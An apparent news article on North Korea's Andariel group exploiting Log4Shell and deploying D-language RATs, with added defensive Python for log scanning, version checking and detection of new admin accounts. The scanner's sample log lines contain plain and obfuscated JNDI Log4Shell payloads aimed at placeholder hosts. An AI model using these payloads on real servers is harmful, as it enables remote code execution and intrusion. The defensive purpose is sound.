North Korean hackers remain relentless in exploiting the Log4Shell vulnerability worldwide.
Recent reports reveal that these hackers, operating as the "Andariel" subgroup within the Lazarus collective, have introduced three new remote access Trojans (RATs).
What sets these attacks apart is their use of the rarely seen D programming language (dlang), a choice that leaves analysts and detection tooling with far less prior experience to draw on.
Andariel's Tactical Mastery: A Lazarus Entity
"Andariel," known by aliases such as Onyx Sleet and Plutonium, operates as a specialized unit within the Lazarus collective, according to Dark Reading.
Focused on securing initial access and ensuring long-term persistence, Andariel primarily serves the interests of the Kim Jong Un regime. However, its activities extend beyond espionage, occasionally involving ransomware attacks against healthcare organizations.
Log4Shell as the Gateway
Andariel's recent intrusions have used the Log4Shell vulnerability as their entry point into target systems. This flaw in Apache Log4j (CVE-2021-44228), rated at the maximum severity of 10.0 on the CVSS scale, remains a favored choice because vulnerable deployments are still widespread.
"For a long time tooling has been collapsing - everybody kind of uses the same tool sets to obscure attribution. Lazarus has gone in the exact opposite direction. They go crazy with writing bespoke malware," Cisco Talos head of outreach Nick Biasini said when asked about the behavior of the North Korean hackers.
Although the vulnerability is two years old, more than a third (38%) of active applications still run vulnerable Log4j versions, as reported by Veracode.
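As an added example, not code from the original report or from the tooling Cisco Talos describes, the following Python covers both sides of the Log4Shell problem raised above: it flags JNDI lookup strings in web-server access logs, including the nested and case-obfuscated forms that defeat a plain search for `jndi:`, and it decides whether a given `log4j-core` version still falls inside the CVE-2021-44228 affected range. The log lines, addresses and jar paths are constructed for the example; the version boundaries follow the Apache Log4j security advisory.

```python
import re
from typing import List, Optional, Tuple

# Part 1: spotting Log4Shell (CVE-2021-44228) triggers in request logs.
# Log4j 2 expands "${prefix:value}" lookups inside logged strings, so an
# attacker-controlled value such as User-Agent is enough to make the server
# dereference a JNDI URL.  Real traffic nests and splits the trigger to beat
# a plain search for "jndi:", e.g. "${${lower:j}ndi:ldap://...}" or
# "${${::-j}ndi:...}".  normalize_lookups() resolves those obfuscation
# lookups the way Log4j would (innermost first, repeatedly) before matching.
_CASE_LOOKUP = re.compile(r"\$\{(?P<fn>lower|upper):(?P<val>[^${}]*)\}", re.IGNORECASE)
# "${anything:-default}" yields "default" when the lookup fails; "${::-j}" and
# "${env:NaN:-j}" are the usual obfuscated spellings of the letter "j".
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-(?P<val>[^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?P<proto>[a-z]+)\s*:(?P<target>[^}]*)\}", re.IGNORECASE)
_JNDI_PROTOCOLS = {"ldap", "ldaps", "rmi", "dns", "iiop", "corba", "nds", "http"}


def normalize_lookups(s: str, max_rounds: int = 16) -> str:
    """Collapse case/default obfuscation lookups to the text Log4j would substitute."""
    for _ in range(max_rounds):  # bounded so hostile input cannot spin forever
        new = _CASE_LOOKUP.sub(
            lambda m: m.group("val").lower() if m.group("fn").lower() == "lower"
            else m.group("val").upper(), s)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group("val"), new)
        if new == s:
            break
        s = new
    return s


def find_log4shell(line: str) -> Optional[Tuple[str, str]]:
    """Return (protocol, target) for a JNDI lookup in the line, or None."""
    # Raw line first, so a literal "${jndi:...}" can never be lost to
    # normalisation, then the de-obfuscated form.
    for candidate in (line, normalize_lookups(line)):
        m = _JNDI.search(candidate)
        if m and m.group("proto").lower() in _JNDI_PROTOCOLS:
            return m.group("proto").lower(), m.group("target").strip()
    return None


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """(line number, protocol, target) for every line carrying a JNDI trigger."""
    hits = []
    for n, line in enumerate(lines, start=1):
        found = find_log4shell(line)
        if found:
            hits.append((n, found[0], found[1]))
    return hits


# Constructed access-log lines; addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 1234 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.5 - - [11/Dec/2021:10:01:15 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.7 - - [11/Dec/2021:10:02:41 +0000] "GET / HTTP/1.1" 200 1234 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/c}"',
    '198.51.100.7 - - [11/Dec/2021:10:02:58 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 ${env:HOME}"',
]

# Part 2: is a log4j-core version still in the CVE-2021-44228 affected range?
# Per the Apache Log4j security advisory: 2.0-beta9 through 2.14.1 are
# affected; fixed in 2.15.0, with backports 2.12.2 (Java 7) and 2.3.1
# (Java 6).  Later releases on those two branches carry the fix as well.
_VERSION = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?")


def parse_version(v: str) -> Tuple[int, int, int, int, int]:
    """'2.14.1' / '2.0-beta9' / '2.0-rc2' -> comparable tuple (beta < rc < final)."""
    m = _VERSION.fullmatch(v.strip().lower())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {v!r}")
    major, minor, patch, pre, pre_no = m.groups()
    stage = {"beta": 0, "rc": 1, None: 2}[pre]
    return (int(major), int(minor), int(patch or 0), stage, int(pre_no or 0))


_FIRST_VULNERABLE = parse_version("2.0-beta9")  # JNDI lookup first shipped here
_FIXED_MAINLINE = parse_version("2.15.0")
_FIXED_ON_BRANCH = {(2, 12): parse_version("2.12.2"), (2, 3): parse_version("2.3.1")}


def vulnerable_to_log4shell(version: str) -> bool:
    v = parse_version(version)
    if v < _FIRST_VULNERABLE:  # Log4j 1.x and early 2.0 betas have no JNDI lookup
        return False
    branch_fix = _FIXED_ON_BRANCH.get(v[:2])
    if branch_fix is not None and v >= branch_fix:
        return False
    return v < _FIXED_MAINLINE


def version_from_jar_name(path: str) -> Optional[str]:
    """'/opt/app/lib/log4j-core-2.14.1.jar' -> '2.14.1'; None for other jars."""
    m = re.search(r"log4j-core-([0-9][^/]*?)\.jar$", path)
    return m.group(1) if m else None


if __name__ == "__main__":
    for n, proto, target in scan_log(SAMPLE_LOG):
        print(f"line {n}: JNDI {proto} lookup to {target}")
    for jar in ("/opt/app/lib/log4j-core-2.14.1.jar", "/opt/app/lib/log4j-core-2.12.2.jar"):
        ver = version_from_jar_name(jar)
        print(f"{jar}: {'VULNERABLE' if vulnerable_to_log4shell(ver) else 'fixed'}")
```

Feed real access-log lines to `scan_log`, and the output of a `find / -name 'log4j-core-*.jar'` to `version_from_jar_name`. Two caveats: the version check answers only CVE-2021-44228, while 2.15.0 and 2.16.0 have follow-up CVEs of their own, so anything below 2.17.1 still needs an upgrade; and shaded or repackaged jars will not carry the `log4j-core-` file name, so a name-based inventory misses them.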
Andariel's Stealth Weapon
Andariel's distinguishing factor lies in its use of the D programming language for crafting novel malware. D is a compiled systems language descended from C and C++ rather than an offshoot of C++, and its runtime and standard library are unfamiliar to most analysts and detection signatures, which complicates both detection and analysis. The recent attacks observed by Cisco Talos targeted an agriculture organization in South America, a European manufacturing company, and an American subsidiary of a Korean physical security company.
The group's toolkit includes three new remote-access Trojans, each serving a distinct purpose. "NineRAT" operates as a dropper and backdoor, using Telegram as its command-and-control (C2) channel. "DLRAT" downloads additional malware and executes commands on infected hosts. "BottomLoader" functions as a downloader.
Once Log4Shell provides initial access, Andariel establishes persistence with its custom proxy tool, "HazyLoad," and then creates new users with administrative privileges on the host. Credential-harvesting tools such as Mimikatz, alongside Andariel's custom malware, are then deployed to extend the intrusion.
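The account-creation step is a concrete detection opportunity. The following Python is an added example, not anything from the Talos report: it correlates Windows Security events 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group) on the same host within a short window, and raises the severity when the acting account is a computer account (`HOST$`), which is what a service running as LocalSystem shows up as, rather than a human administrator. The events are constructed for the example with field names simplified from EventData; real input would come from EVTX files or a SIEM.

```python
from datetime import datetime, timedelta
from typing import Dict, List

# Local groups whose membership grants administrative control of the host.
ADMIN_GROUPS = {"Administrators", "Backup Operators"}

# Constructed Windows Security events.  Field names are simplified from the
# EventData of 4720 ("A user account was created") and 4732 ("A member was
# added to a security-enabled local group").  "subject" is the account that
# performed the action: when a service running as LocalSystem creates a user,
# it is the computer account "HOST$" rather than a human administrator.
EVENTS: List[Dict[str, str]] = [
    {"time": "2023-12-11T03:14:02", "host": "WEB-01", "id": "4720",
     "subject": "WEB-01$", "target": "svc_update"},
    {"time": "2023-12-11T03:14:05", "host": "WEB-01", "id": "4732",
     "subject": "WEB-01$", "target": "svc_update", "group": "Administrators"},
    {"time": "2023-12-11T09:30:00", "host": "HR-07", "id": "4720",
     "subject": "CORP\\helpdesk", "target": "jdoe"},
    {"time": "2023-12-11T09:31:10", "host": "HR-07", "id": "4732",
     "subject": "CORP\\helpdesk", "target": "jdoe", "group": "Remote Desktop Users"},
    {"time": "2023-12-11T09:45:00", "host": "HR-07", "id": "4720",
     "subject": "CORP\\helpdesk", "target": "contractor"},
    {"time": "2023-12-11T11:00:00", "host": "HR-07", "id": "4732",
     "subject": "CORP\\helpdesk", "target": "contractor", "group": "Administrators"},
]


def correlate_new_admins(events: List[Dict[str, str]],
                         window_minutes: int = 10) -> List[Dict[str, str]]:
    """Alert when a freshly created account joins an admin group within the window."""
    window = timedelta(minutes=window_minutes)
    created: Dict[tuple, datetime] = {}  # (host, user) -> creation time
    alerts: List[Dict[str, str]] = []
    for e in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(e["time"])
        key = (e["host"].upper(), e["target"].lower())
        if e["id"] == "4720":
            created[key] = when
        elif e["id"] == "4732" and e.get("group") in ADMIN_GROUPS:
            born = created.get(key)
            if born is not None and when - born <= window:
                alerts.append({
                    "host": e["host"], "user": e["target"], "group": e["group"],
                    "by": e["subject"],
                    # A machine-account subject means no interactive admin did this.
                    "severity": "high" if e["subject"].endswith("$") else "medium",
                })
    return alerts


if __name__ == "__main__":
    for a in correlate_new_admins(EVENTS):
        print(f"[{a['severity']}] {a['host']}: new account {a['user']} added to "
              f"{a['group']} by {a['by']}")
```

With the default ten-minute window only the `WEB-01` sequence fires: the `contractor` account on `HR-07` was promoted 75 minutes after creation and a help-desk user did it, which is ordinary provisioning. Widen the window and it appears at medium severity, so tune the window to how quickly legitimate provisioning in the environment completes.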
The Challenge of Unconventional Programming: DPRK's Signature Approach
North Korean hackers, particularly those under the Lazarus umbrella, take a distinctive approach to evading detection: they mass-produce custom malware in unconventional programming languages, so that signatures and heuristics built around common toolchains have nothing to match.
Languages like D add complexity for defenders, making it harder for traditional detection programs to identify and flag the group's activity.
Andariel is one unit within Lazarus rather than a new persona, and nothing suggests that the group will pause its cyber operations anytime soon. For organizations, extra vigilance is always required to mitigate the risk.
Malware written in less common languages demands a nuanced understanding of detection mechanisms. Traditional detection tools, often tuned to binaries from more common languages and compilers, may struggle with the challenges these North Korean hackers present.
Organizations must remain adaptable, continuously refining their defense strategies to counter the innovative tactics employed by persistent threat actors like Andariel within the Lazarus collective.